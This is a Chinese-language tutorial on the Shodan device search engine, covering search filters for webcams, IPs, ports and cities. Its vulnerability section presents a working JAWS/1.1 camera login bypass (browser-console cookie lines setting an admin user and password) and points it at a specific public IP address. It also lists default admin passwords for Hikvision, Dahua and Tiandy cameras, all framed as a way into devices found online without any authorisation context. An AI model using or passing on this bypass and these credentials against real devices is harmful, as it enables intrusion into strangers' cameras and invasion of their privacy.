Shodan 搜索

一、简介

与谷歌不同的是，Shodan不是在网上搜s索网址，而是直接进入互联网的背后通道。Shodan可以说是一款“黑暗”谷歌，一刻不停的在寻找着所有和互联网关联的服务器、摄像头、打印机、路由器等等。每个月Shodan都会在大约5亿个服务器上日夜不停地搜集信息。

正确上网后访问：Shodan 官网：https://www.shodan.io

二、注册

使用 Shodan 最好是注册一下，因为不注册的话功能会受限制。需要注册帐号，请打开返个链接注册：https://account.shodan.io/register

三、Shodan 搜索技巧

1、搜索 Webcam 摄像头设备

在搜索框中输入“webcam”或“网络摄像头”进行搜索。也可以限制城市，比如输入： city:beijing webcam

2、搜索 IP 地址

比如搜索：

net:101.222.129.35

3、搜索指定端口

在搜索框中输入 port：端口号，就可以搜索指定端口。

我们可以尝试一些常用端口来进行，搜索比如说我们搜索 80 端口

4、搜索具体城市

搜索栏中输入 city:Beijing 就可以搜索出北京的联网设备，我们可以和 port 迕行组合查询输入 city:beijing port:80 我们可以搜索到北京开放 80 端口的设备

5、搜索具体漏洞

比如：搜索摄像头漏洞JAWS/1.1，若找到该漏洞的摄像头，那么可以执行下列代码，跳过认证。

document.cookie="dvr_camcnt=4";
document.cookie="dvr_usr=admin";
document.cookie="dvr_pwd=123";

找到具有漏洞的服务器，打开，然后在浏览器控制台输入以上命令

浏览器中输入view2.html重新加载页面。

http://5.88.120.91:60001/view2.html

比如：常见摄像头漏洞

海康威视的摄像头（搜索：Hikvsion，用户名：admin，密码：12345）

大华摄像头（用户名：admin，密码：888888）

天地伟业摄像头（用户名：Admin，密码：111111）

四、参考

1、摄像头

http://0day5.com/archives/3766/

2、google黑客资料库

https://www.exploit-db.com/google-hacking-database/

3、Shodan 语法

http://www.freebuf.com/sectool/121339.html

4、域传送漏洞

https://github.com/lijiejie/edu-dns-zone-transfer

5、收集子域名的思路

https://www.secpulse.com/archives/53182.html

6、web信息搜集

https://blog.csdn.net/qq_41741971/article/details/103174675?depth_1-utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromBaidu-9&utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromBaidu-9

https://blog.csdn.net/fly_hps/article/details/80944542

https://www.fujieace.com/penetration-test/web-collect-message.html